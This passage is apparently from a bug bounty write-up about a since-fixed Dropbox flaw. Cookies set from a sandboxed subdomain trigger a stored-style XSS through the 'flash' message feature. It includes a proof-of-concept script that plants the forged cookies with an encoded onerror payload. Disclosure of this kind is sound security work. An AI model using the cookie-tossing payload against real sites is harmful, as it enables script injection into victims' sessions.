dl-web.dropbox.com, so we cannot easily steal any other user’s session.
What I want to point out here is that we can set any cookie for the global domain (
.dropbox.com) since the sandboxed domain is also under the global domain even though we cannot directly access cookies on the main subdomain (www.dropbox.com). I thought it may be able to make something happen on
I found a some nice feature, Flash. It is a pop message appeared for 1-2 seconds, which is triggered by cookies. After cookies, “flash” and “bang”, are given, it draws a small message box containing a text written in cookie “flash”, and check the correctness of the ‘flash’ with cookie ‘bang’. The ‘bang’ seems like a hmac of “flash”. So, I need to find a correct “bang” value for my custom “flash”.
Now, I can make any flash messages with any text.
After uploading a HTML file that assigns the malicious cookies given from the device unlink function, make victim to click your page. The flash meesage will appear and attack the victim when the victim opens a dropbox web page.
1 2 3 4 5 6 7 <script> document.cookie="bang=QUFEZGthYS1CaTNfWUpYcDUwdjNxemVHSHlhSHJkU3BEdnhKRUxOZVZ3b2ZoUQ%3D%3D; Domain=dropbox.com; Path=/;"; document.cookie="flash=b2s6PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmRvbWFpbik%2BIHVubGlua 2VkIHN1Y2Nlc3NmdWxseS4%3D; Domain=dropbox.com; Path=/"; location.href="https://dropbox.com/forgot"; </script>
There is a CSP. But, the script can be executed on IE or Safari.
2015/05/02 Fixed, a bounty of $1,331